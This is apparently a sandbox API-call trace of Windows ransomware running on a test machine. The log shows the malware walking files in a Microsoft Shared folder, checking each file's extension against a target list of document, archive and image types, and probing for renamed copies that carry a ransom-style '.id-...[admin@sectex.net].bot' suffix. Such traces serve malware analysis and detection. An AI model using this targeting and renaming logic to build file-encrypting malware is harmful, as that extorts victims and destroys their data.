	[0138.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324
	[0138.452] GetFileSizeEx (in: hFile=0x324, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=224256) returned 1
	[0138.453] CloseHandle (hObject=0x324) returned 1
	[0138.453] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi")) returned 0x20
	[0138.453] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.453] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0138.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0138.453] lstrlenW (lpString=".doc") returned 4
	[0138.453] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.453] lstrlenW (lpString=".docx") returned 5
	[0138.453] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1
	[0138.453] lstrlenW (lpString=".pdf") returned 4
	[0138.453] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.453] lstrlenW (lpString=".xls") returned 4
	[0138.453] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.453] lstrlenW (lpString=".xlsx") returned 5
	[0138.453] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1
	[0138.453] lstrlenW (lpString=".ppt") returned 4
	[0138.453] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0138.453] lstrlenW (lpString=".zip") returned 4
	[0138.453] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.453] lstrlenW (lpString=".rar") returned 4
	[0138.453] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.453] lstrlenW (lpString=".bz2") returned 4
	[0138.453] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.454] lstrlenW (lpString=".7z") returned 3
	[0138.454] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0138.454] lstrlenW (lpString=".dbf") returned 4
	[0138.454] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0138.454] lstrlenW (lpString=".1cd") returned 4
	[0138.454] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0138.454] lstrlenW (lpString=".jpg") returned 4
	[0138.454] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0138.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0138.454] lstrlenW (lpString=".doc") returned 4
	[0138.454] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1
	[0138.454] lstrlenW (lpString=".docx") returned 5
	[0138.454] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1
	[0138.454] lstrlenW (lpString=".pdf") returned 4
	[0138.454] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1
	[0138.454] lstrlenW (lpString=".xls") returned 4
	[0138.454] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1
	[0138.454] lstrlenW (lpString=".xlsx") returned 5
	[0138.454] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1
	[0138.454] lstrlenW (lpString=".ppt") returned 4
	[0138.454] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1
	[0138.454] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0138.454] lstrlenW (lpString=".zip") returned 4
	[0138.454] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1
	[0138.454] lstrlenW (lpString=".rar") returned 4
	[0138.454] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1
	[0138.454] lstrlenW (lpString=".bz2") returned 4
	[0138.454] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1
	[0138.454] lstrlenW (lpString=".7z") returned 3
	[0138.454] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1
	[0138.455] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0138.455] lstrlenW (lpString=".dbf") returned 4
	[0138.455] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1
	[0138.455] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0138.455] lstrlenW (lpString=".1cd") returned 4
	[0138.455] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1
	[0138.455] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67
	[0138.455] lstrlenW (lpString=".jpg") returned 4
	[0138.455] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1
	[0138.455] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0138.455] lstrlenW (lpString="ipsesp.xml") returned 10
	[0138.455] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324
	[0138.458] GetFileSizeEx (in: hFile=0x324, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=3024) returned 1
	[0138.458] CloseHandle (hObject=0x324) returned 1
	[0138.458] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml")) returned 0x20
	[0138.458] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.458] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsesp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.458] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61
	[0138.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61
	[0138.459] lstrlenW (lpString=".doc") returned 4
	[0138.459] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0138.459] lstrlenW (lpString=".docx") returned 5
	[0138.459] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0138.459] lstrlenW (lpString=".pdf") returned 4
	[0138.459] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0138.459] lstrlenW (lpString=".xls") returned 4
	[0138.459] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0138.459] lstrlenW (lpString=".xlsx") returned 5
	[0138.459] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0138.459] lstrlenW (lpString=".ppt") returned 4
	[0138.459] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0138.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61
	[0138.459] lstrlenW (lpString=".zip") returned 4
	[0138.459] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0138.459] lstrlenW (lpString=".rar") returned 4
	[0138.459] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0138.459] lstrlenW (lpString=".bz2") returned 4
	[0138.459] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0138.459] lstrlenW (lpString=".7z") returned 3
	[0138.459] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0138.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61
	[0138.459] lstrlenW (lpString=".dbf") returned 4
	[0138.459] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0138.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61
	[0138.459] lstrlenW (lpString=".1cd") returned 4
	[0138.459] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0138.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61
	[0138.459] lstrlenW (lpString=".jpg") returned 4
	[0138.459] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0138.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61
	[0138.459] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61
	[0138.459] lstrlenW (lpString=".doc") returned 4
	[0138.460] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0138.460] lstrlenW (lpString=".docx") returned 5
	[0138.460] lstrcmpiW (lpString1=".docx", lpString2="p.xml") returned -1
	[0138.460] lstrlenW (lpString=".pdf") returned 4
	[0138.460] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0138.460] lstrlenW (lpString=".xls") returned 4
	[0138.460] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0138.460] lstrlenW (lpString=".xlsx") returned 5
	[0138.460] lstrcmpiW (lpString1=".xlsx", lpString2="p.xml") returned -1
	[0138.460] lstrlenW (lpString=".ppt") returned 4
	[0138.460] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0138.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61
	[0138.460] lstrlenW (lpString=".zip") returned 4
	[0138.460] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0138.460] lstrlenW (lpString=".rar") returned 4
	[0138.460] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0138.460] lstrlenW (lpString=".bz2") returned 4
	[0138.460] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0138.460] lstrlenW (lpString=".7z") returned 3
	[0138.460] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0138.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61
	[0138.460] lstrlenW (lpString=".dbf") returned 4
	[0138.460] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0138.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61
	[0138.460] lstrlenW (lpString=".1cd") returned 4
	[0138.460] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0138.460] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsesp.xml") returned 61
	[0138.460] lstrlenW (lpString=".jpg") returned 4
	[0138.460] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0138.460] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0138.461] lstrlenW (lpString="ipsfin.xml") returned 10
	[0138.461] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324
	[0138.461] GetFileSizeEx (in: hFile=0x324, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2658) returned 1
	[0138.461] CloseHandle (hObject=0x324) returned 1
	[0138.462] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml")) returned 0x20
	[0138.462] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.462] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned 61
	[0138.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned 61
	[0138.462] lstrlenW (lpString=".doc") returned 4
	[0138.462] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0138.462] lstrlenW (lpString=".docx") returned 5
	[0138.462] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1
	[0138.462] lstrlenW (lpString=".pdf") returned 4
	[0138.462] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0138.462] lstrlenW (lpString=".xls") returned 4
	[0138.462] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0138.462] lstrlenW (lpString=".xlsx") returned 5
	[0138.462] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1
	[0138.462] lstrlenW (lpString=".ppt") returned 4
	[0138.462] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0138.462] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned 61
	[0138.462] lstrlenW (lpString=".zip") returned 4
	[0138.462] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0138.462] lstrlenW (lpString=".rar") returned 4
	[0138.462] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0138.462] lstrlenW (lpString=".bz2") returned 4
	[0138.462] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0138.462] lstrlenW (lpString=".7z") returned 3
	[0138.462] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0138.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned 61
	[0138.463] lstrlenW (lpString=".dbf") returned 4
	[0138.463] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0138.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned 61
	[0138.463] lstrlenW (lpString=".1cd") returned 4
	[0138.463] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0138.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned 61
	[0138.463] lstrlenW (lpString=".jpg") returned 4
	[0138.463] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0138.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned 61
	[0138.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned 61
	[0138.463] lstrlenW (lpString=".doc") returned 4
	[0138.463] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0138.463] lstrlenW (lpString=".docx") returned 5
	[0138.463] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1
	[0138.463] lstrlenW (lpString=".pdf") returned 4
	[0138.463] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0138.463] lstrlenW (lpString=".xls") returned 4
	[0138.463] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0138.463] lstrlenW (lpString=".xlsx") returned 5
	[0138.463] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1
	[0138.463] lstrlenW (lpString=".ppt") returned 4
	[0138.463] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0138.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned 61
	[0138.463] lstrlenW (lpString=".zip") returned 4
	[0138.463] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0138.463] lstrlenW (lpString=".rar") returned 4
	[0138.463] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0138.463] lstrlenW (lpString=".bz2") returned 4
	[0138.463] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0138.463] lstrlenW (lpString=".7z") returned 3
	[0138.463] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0138.463] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned 61
	[0138.463] lstrlenW (lpString=".dbf") returned 4
	[0138.463] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0138.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned 61
	[0138.464] lstrlenW (lpString=".1cd") returned 4
	[0138.464] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0138.464] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned 61
	[0138.464] lstrlenW (lpString=".jpg") returned 4
	[0138.464] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0138.464] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0138.464] lstrlenW (lpString="ipsfra.xml") returned 10
	[0138.464] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324
	[0138.465] GetFileSizeEx (in: hFile=0x324, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2628) returned 1
	[0138.465] CloseHandle (hObject=0x324) returned 1
	[0138.465] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml")) returned 0x20
	[0138.465] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.465] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61
	[0138.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61
	[0138.465] lstrlenW (lpString=".doc") returned 4
	[0138.465] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0138.465] lstrlenW (lpString=".docx") returned 5
	[0138.465] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1
	[0138.465] lstrlenW (lpString=".pdf") returned 4
	[0138.465] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0138.465] lstrlenW (lpString=".xls") returned 4
	[0138.465] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0138.465] lstrlenW (lpString=".xlsx") returned 5
	[0138.465] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1
	[0138.465] lstrlenW (lpString=".ppt") returned 4
	[0138.465] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0138.465] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61
	[0138.465] lstrlenW (lpString=".zip") returned 4
	[0138.465] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0138.466] lstrlenW (lpString=".rar") returned 4
	[0138.466] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0138.466] lstrlenW (lpString=".bz2") returned 4
	[0138.466] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0138.466] lstrlenW (lpString=".7z") returned 3
	[0138.466] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0138.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61
	[0138.466] lstrlenW (lpString=".dbf") returned 4
	[0138.466] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0138.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61
	[0138.466] lstrlenW (lpString=".1cd") returned 4
	[0138.466] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0138.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61
	[0138.466] lstrlenW (lpString=".jpg") returned 4
	[0138.466] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0138.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61
	[0138.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61
	[0138.466] lstrlenW (lpString=".doc") returned 4
	[0138.466] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0138.466] lstrlenW (lpString=".docx") returned 5
	[0138.466] lstrcmpiW (lpString1=".docx", lpString2="a.xml") returned -1
	[0138.466] lstrlenW (lpString=".pdf") returned 4
	[0138.466] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0138.466] lstrlenW (lpString=".xls") returned 4
	[0138.466] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0138.466] lstrlenW (lpString=".xlsx") returned 5
	[0138.466] lstrcmpiW (lpString1=".xlsx", lpString2="a.xml") returned -1
	[0138.466] lstrlenW (lpString=".ppt") returned 4
	[0138.466] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0138.466] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61
	[0138.466] lstrlenW (lpString=".zip") returned 4
	[0138.466] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0138.466] lstrlenW (lpString=".rar") returned 4
	[0138.466] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0138.467] lstrlenW (lpString=".bz2") returned 4
	[0138.467] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0138.467] lstrlenW (lpString=".7z") returned 3
	[0138.467] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0138.467] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61
	[0138.467] lstrlenW (lpString=".dbf") returned 4
	[0138.467] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0138.467] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61
	[0138.467] lstrlenW (lpString=".1cd") returned 4
	[0138.467] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1
	[0138.467] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned 61
	[0138.467] lstrlenW (lpString=".jpg") returned 4
	[0138.467] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1
	[0138.467] RtlReAllocateHeap (Heap=0x7ab0000, Flags=0x0, Ptr=0xb611338, Size=0x4000) returned 0xb611338
	[0138.467] lstrcmpiW (lpString1=".xml", lpString2=".bot") returned 1
	[0138.467] lstrlenW (lpString="ipshrv.xml") returned 10
	[0138.467] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324
	[0138.467] GetFileSizeEx (in: hFile=0x324, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=2652) returned 1
	[0138.467] CloseHandle (hObject=0x324) returned 1
	[0138.467] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml")) returned 0x20
	[0138.468] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0138.468] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0138.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61
	[0138.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61
	[0138.468] lstrlenW (lpString=".doc") returned 4
	[0138.468] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1
	[0138.468] lstrlenW (lpString=".docx") returned 5
	[0138.468] lstrcmpiW (lpString1=".docx", lpString2="v.xml") returned -1
	[0138.468] lstrlenW (lpString=".pdf") returned 4
	[0138.468] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1
	[0138.468] lstrlenW (lpString=".xls") returned 4
	[0138.468] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1
	[0138.468] lstrlenW (lpString=".xlsx") returned 5
	[0138.468] lstrcmpiW (lpString1=".xlsx", lpString2="v.xml") returned -1
	[0138.468] lstrlenW (lpString=".ppt") returned 4
	[0138.468] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1
	[0138.468] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned 61
	[0138.468] lstrlenW (lpString=".zip") returned 4
	[0138.468] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1
	[0138.468] lstrlenW (lpString=".rar") returned 4
	[0138.468] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0138.468] lstrlenW (lpString=".bz2") returned 4
	[0138.468] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0138.468] lstrlenW (lpString=".7z") returned 3
	[0138.468] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
